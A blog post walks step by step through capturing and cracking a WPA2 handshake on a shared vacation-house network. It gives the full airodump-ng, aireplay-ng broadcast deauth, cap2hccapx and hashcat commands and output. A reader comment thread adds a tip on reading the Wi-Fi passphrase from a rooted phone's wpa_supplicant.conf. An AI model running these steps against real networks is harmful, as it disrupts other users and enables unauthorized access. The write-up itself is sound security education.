Address
304 North Cardinal St.
Dorchester Center, MA 02124

Work Hours
Monday to Friday: 7AM - 7PM
Weekend: 10AM - 5PM

Hashcat WPA2 Cracking – Beach Edition

As a perfect follow-up to our Wireless CTF win, I present some hashcat WPA2 cracking.

The Challenge

I headed to the beach right after DEF CON, to spend some time with Hacker’s Girlfriend and her family.

My first day there the girlfriend told me, “If you don’t come to the beach with me, then I won’t give you the Wi-Fi password.” Unfortunately, there were two problems with this scenario. The first was that I had plenty of books, beer, or 4G signal, to keep myself busy for a few days. The second, and most import as I explained to her, was that I had just recently come back from winning a wireless hacking competition at DEF CON.

I still went down to the beach with her, but I decided to prove my point a bit later.

Finding the Network

Shortly after dinner, she went off shopping, so I got to work.

First, I made sure that I connected and properly configured my wireless card.

root@kali32:~# iwconfig
wlan0     IEEE 802.11bgn  ESSID:off/any 
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Encryption key:off
          Power Management:off

Then, I needed to find the network. This was easy enough with , as it was the AP with the highest power.

root@kali32:~# airodump-ng wlan0
 CH 10 ][ Elapsed: 18 s ][ 2017-08-01 21:15                                         

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:25:xx:xx:xx:xx   -1        0        0    0  -1  -1                           
 00:23:xx:xx:xx:xx  -48       27      254    0  11  54e  WPA2 CCMP   PSK  beachbreeze       
 00:1D:xx:xx:xx:xx  -64       31        3    0  11  54e  WPA2 CCMP   PSK  xxxxxxxx       

Capturing the Traffic

Next, I needed to capture and log the traffic to this AP.

The first thing I did was place my interface into monitor mode.

root@kali32:~# airmon-ng start wlan0 11

Found 2 processes that could cause trouble.
If airodump-ng, aireplay-ng or airtun-ng stops working after
a short period of time, you may want to run 'airmon-ng check kill'

  PID Name
  328 NetworkManager
  767 wpa_supplicant

PHY    Interface    Driver        Chipset

phy0    wlan0        ath9k_htc    Atheros Communications, Inc. AR9271 802.11n

        (mac80211 monitor mode already enabled for [phy0]wlan0 on [phy0]11)

Then, I pointed airodump at the proper SSID, and began saving the output to wpa-breeze.

root@kali32:~# airodump-ng --bssid 00:23:xx:xx:xx:xx -c 11 --write wpa-breeze wlan0

Deauth ALL THE THINGS!

I figured it would be simple enough to capture a handshake, since the kids (and adults) needed their Wi-Fi.

In this case, since I wasn’t worried about a short outage, I decided to just send 25 broadcast deauths to speed things along.

root@kali32:~# aireplay-ng --deauth 25 -a 00:23:xx:xx:xx:xx wlan0
21:23:24  Waiting for beacon frame (BSSID: 00:23:xx:xx:xx:xx) on channel 11
NB: this attack is more effective when targeting
a connected wireless client (-c ).
21:23:24  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]
21:23:25  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]
21:23:25  Sending DeAuth to broadcast -- BSSID: [00:23:xx:xx:xx:xx]

As a result, I was able to quickly capture a new WPA handshake.

 CH 11 ][ Elapsed: 4 mins ][ 2017-08-01 21:27 ][ WPA handshake: 00:23:xx:xx:xx:xx       

 BSSID              PWR RXQ  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID

 00:23:xx:xx:xx:xx  -44  92     2506    72556   76  11  54e  WPA2 CCMP   PSK  beachbreeze 

File Conversion

For those of you unfamiliar, hashcat WPA2 cracking requires .hccapx files.

In this case, I needed to convert my .cap to a .hccapx so that I could crack it using hashcat.

First, I downloaded the hashcat-utils.

Rays-MacBook-Pro:tools doyler$ git clone https://github.com/hashcat/hashcat-utils
Cloning into 'hashcat-utils'...
remote: Counting objects: 391, done.
remote: Total 391 (delta 0), reused 0 (delta 0), pack-reused 391
Receiving objects: 100% (391/391), 110.78 KiB | 106.00 KiB/s, done.
Resolving deltas: 100% (250/250), done.

Next, I built all the utils in the src directory.

Rays-MacBook-Pro:src doyler$ pwd
/Users/doyler/tools/hashcat-utils/src
Rays-MacBook-Pro:src doyler$ make
rm -f ../bin/*
rm -f *.bin *.exe
cc -Wall -W -pipe -O2 -std=gnu99  -o cap2hccapx.bin cap2hccapx.c
cc -Wall -W -pipe -O2 -std=gnu99  -o cleanup-rules.bin cleanup-rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combinator.bin combinator.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combinator3.bin combinator3.c
cc -Wall -W -pipe -O2 -std=gnu99  -o combipow.bin combipow.c
cc -Wall -W -pipe -O2 -std=gnu99  -o ct3_to_ntlm.bin ct3_to_ntlm.c
cc -Wall -W -pipe -O2 -std=gnu99  -o cutb.bin cutb.c
cc -Wall -W -pipe -O2 -std=gnu99  -o expander.bin expander.c
cc -Wall -W -pipe -O2 -std=gnu99  -o gate.bin gate.c
cc -Wall -W -pipe -O2 -std=gnu99  -o generate-rules.bin generate-rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o hcstatgen.bin hcstatgen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o hcstat2gen.bin hcstat2gen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o keyspace.bin keyspace.c
cc -Wall -W -pipe -O2 -std=gnu99  -o len.bin len.c
cc -Wall -W -pipe -O2 -std=gnu99  -o mli2.bin mli2.c
cc -Wall -W -pipe -O2 -std=gnu99  -o morph.bin morph.c
cc -Wall -W -pipe -O2 -std=gnu99  -o permute.bin permute.c
cc -Wall -W -pipe -O2 -std=gnu99  -o permute_exist.bin permute_exist.c
cc -Wall -W -pipe -O2 -std=gnu99  -o prepare.bin prepare.c
cc -Wall -W -pipe -O2 -std=gnu99  -o req-include.bin req-include.c
cc -Wall -W -pipe -O2 -std=gnu99  -o req-exclude.bin req-exclude.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rli.bin rli.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rli2.bin rli2.c
cc -Wall -W -pipe -O2 -std=gnu99  -o rules_optimize.bin rules_optimize.c cpu_rules.c
cc -Wall -W -pipe -O2 -std=gnu99  -o splitlen.bin splitlen.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsr.bin strip-bsr.c
cc -Wall -W -pipe -O2 -std=gnu99  -o strip-bsn.bin strip-bsn.c

Finally, I used cap2hccapx to convert the .cap file to a .hccapx file.

Rays-MacBook-Pro:src doyler$ ./cap2hccapx.bin ~/Documents/_CTFs_/wpa/wpa-breeze-01.cap ~/Documents/_CTFs_/wpa/breeze.hccapx
Networks detected: 1

[*] BSSID=00:23:xx:xx:xx:xx ESSID=beachbreeze (Length: 11)
 --> STA=4c:66:xx:xx:xx:xx, Message Pair=0, Replay Counter=0
 --> STA=4c:66:xx:xx:xx:xx, Message Pair=2, Replay Counter=0
 --> STA=c0:18:xx:xx:xx:xx, Message Pair=2, Replay Counter=0

Written 3 WPA Handshakes to: /Users/doyler/Documents/_CTFs_/wpa/breeze.hccapx

Hashcat WPA2 Cracking

With the .hccapx file in hand, cracking it with hashcat was a breeze.

I used the the following flags and options to actually perform the cracking.

  • -m 2500 = WPA/WPA2 hash mode
  • -r ~/tools/cracking/best64.rule = using my best64 as a rule to modify the dictionary
  • -d 2,3 = telling hashcat to only use devices 2 and 3 on my machine (skipping my CPU)
  • breeze.hccapx = the .hccapx I was trying to crack
  • ~/tools/cracking/rockyou.txt = the location of my rockyou dictionary
Rays-MacBook-Pro:wpa doyler$ hashcat -m 2500 -r ~/tools/cracking/best64.rule -d 2,3 breeze.hccapx ~/tools/cracking/rockyou.txt
hashcat () starting...

OpenCL Platform #1: Apple
=========================
* Device #1: Intel(R) Core(TM) i7-6920HQ CPU @ 2.90GHz, skipped.
* Device #2: Intel(R) HD Graphics 530, 384/1536 MB allocatable, 24MCU
* Device #3: AMD Radeon Pro 460 Compute Engine, 1024/4096 MB allocatable, 16MCU

Hashes: 3 digests; 2 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 77

Applicable optimizers:
* Zero-Byte
* Single-Salt
* Slow-Hash-SIMD

Watchdog: Temperature abort trigger disabled.
Watchdog: Temperature retain trigger disabled.

Dictionary cache built:
* Filename..: /Users/doyler/tools/cracking/rockyou.txt
* Passwords.: 14344391
* Bytes.....: 139921497
* Keyspace..: 1104433792

[s]tatus [p]ause [r]esume [b]ypass [c]heckpoint [q]uit => s

Session..........: hashcat
Status...........: Running
Hash.Type........: WPA/WPA2
Hash.Target......: breeze.hccapx
Time.Started.....: Wed Aug  2 19:51:57 2017 (4 secs)
Time.Estimated...: Thu Aug  3 00:47:28 2017 (4 hours, 55 mins)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     2713 H/s (7.96ms)
Speed.Dev.#3.....:    58856 H/s (8.08ms)
Speed.Dev.#*.....:    61549 H/s
Recovered........: 0/2 (0.00%) Digests, 0/1 (0.00%) Salts
Progress.........: 12866667/1104433792 (1.17%)
Rejected.........: 12686443/12866667 (98.60%)
Restore.Point....: 0/14343296 (0.00%)
Candidates.#2....: 123456789 -> 09876543210
Candidates.#3....: 20032003 -> ARCTICCAT

42xxxxxxxxxxxxxxxxxxxxxxxxxxxxd7:00xxxxxxxxe3:c0xxxxxxxx03:beachbreeze:RXXXXXXE
b0xxxxxxxxxxxxxxxxxxxxxxxxxxxx32:00xxxxxxxxe3:4cxxxxxxxxd8:beachbreeze:RXXXXXXE

Session..........: hashcat
Status...........: Cracked
Hash.Type........: WPA/WPA2
Hash.Target......: breeze.hccapx
Time.Started.....: Wed Aug  2 19:51:57 2017 (5 secs)
Time.Estimated...: Wed Aug  2 19:52:02 2017 (0 secs)
Guess.Base.......: File (/Users/doyler/tools/cracking/rockyou.txt)
Guess.Mod........: Rules (/Users/doyler/tools/cracking/best64.rule)
Guess.Queue......: 1/1 (100.00%)
Speed.Dev.#2.....:     5192 H/s (8.00ms)
Speed.Dev.#3.....:    58907 H/s (8.08ms)
Speed.Dev.#*.....:    64099 H/s
Recovered........: 2/2 (100.00%) Digests, 1/1 (100.00%) Salts
Progress.........: 12981355/1104433792 (1.18%)
Rejected.........: 12686443/12981355 (97.73%)
Restore.Point....: 0/14343296 (0.00%)
Candidates.#2....: 123456789 -> 09876543210
Candidates.#3....: 20032003 -> ARCTICCAT

Started: Wed Aug  2 19:51:52 2017
Stopped: Wed Aug  2 19:52:03 2017

Furthermore, once I had everything setup, it only took hashcat 11 seconds to crack the password!

Hashcat WPA2 Cracking – Conclusion

While this was a simpler network to get into, it was still a fun challenge. That, plus this was a great way to show a challenge that we faced during the wireless CTF. Note that this was a network that I had access to due to our staying there. I do not recommend attacking networks that you do not control or own without permission.

In the end, the password worked, and I was able to connect to the network!

Hashcat WPA2 Cracking - Connected

4 Comments

  1. I was running into some issue with hashcat on rules. that’s where I found your blog regarding using rules. I was wondering if you might be able to give me some pointers. I have an extra router I bought a while back. I told my wife to set a password on it and not tell me. It had to be 8 characters min. I had my android phone connect to it after my wife entered the password. I was able to get a handshack. The issue I’m having now is that I been using the rockyou, and other password wordlist I downloaded from the web.

    My question is now. If the rock you, and the downloaded wordlist didn’t find the word would best64.rule work for it?

    Is there some kind of rule just for the wpa2 file I could use ? I really don’t want to keep downloading wordlist from the net since they could be big and a lot of junk symbols in the file. Let me know what you think .

    Thanks,

    • Sure, glad to try and help!

      First of all, if you’ve rooted your phone, you can just find the passphrase in the /data/misc/wifi/wpa_supplicant.conf file.

      That said, if not, you can find the best64 rule from here – https://github.com/hashcat/hashcat/tree/master/rules

      Note that rules are just modifications to words in your wordlist (capitalize first letter, leet-speak replacements, etc.). If the original word (or close to it) is not in your original wordlist, then you will not crack the hash.

      I normally just run best64 + rockyou on my personal machine before sending it off to our more powerful cracking rig. That said, I’m hoping to finish my password cracker soon and have even more techniques/power!

      • Thank you for taking the time on replying back. I think the word might not be in the list. I did ask for a hint on the password. That didn’t help at all. I did try the best64 on my machine. took a few minutes to go over the file. I guess I have to continue trying with other word list.

        when you move it to your other rig are you using the same wordlist or a different one? What spec if you don’t mind me asking is the rig?

        Mine i have 1070ti and a 1050ti card running. I really wish I could get at least 1 1080ti to add to my machine..

        thanks again for your help.

        • Ah, too bad. Yea, WPA is hard to crack, and if it isn’t in your dictionary you’re probalby out of luck.

          I’ll normally be using the same wordlist, but I will probably start to branch out more and perform some testing/analysis.

          The rig will have one GTX 1080 (non TI for now unfortunately). I’d love to add a 2nd card (the TI) once I get more money, but the goal was a cracking rig for <$1500.

Leave a Reply

Your email address will not be published. Required fields are marked *

This site uses Akismet to reduce spam. Learn how your comment data is processed.